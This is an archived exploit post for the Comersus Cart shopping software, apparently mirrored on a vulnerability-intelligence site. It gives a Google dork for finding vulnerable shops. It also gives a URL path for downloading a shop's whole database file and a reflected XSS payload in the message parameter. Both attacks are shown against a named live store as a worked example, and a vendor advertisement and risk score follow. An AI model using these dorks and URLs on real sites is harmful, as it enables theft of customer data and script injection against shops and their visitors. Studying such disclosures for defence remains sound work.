Lucene search
comersus-disclosexss.txt
Exploit type: Comersus Cart, multiple exploits (XSS + remote database disclosure), script's homepage: comersus.com, contact: [email protected], remote database disclosure: http://[website]/[script]/database/commersus.mdb, remote XSS exploit: http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script
Show more
`000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
[+] Script : Comersus Cart
[+] Exploit Type : Multiple Exploits (XSS + remote database disclosure)
[+] Script's Homepage : http://comersus.com
[+] Google Dork : inurl:.asp? Powered by Comersus ASP Shopping Cart
[+] Contact : [email protected]
--//--> Exploit :
1) Remote Database Disclure :
http://[website]/[script]/database/commersus.mdb
2) Remote XSS exploit :
In simple words :
http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]
[Peace xD ]
//Example for str0ke :
https://www.tarkentonsports.com/Comersus/database/comersus.mdb
https://www.tarkentonsports.com/Comersus/store/comersus_message.asp?message=%3Cscript%3Ealert(%27Bl@ckbe@rD%20is%20not%20dead%20yet%27)%3C/script%3E[Peace%20xD%20]
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo29 Nov 2008 00:00Current
7.4High risk
Vulners AI Score7.4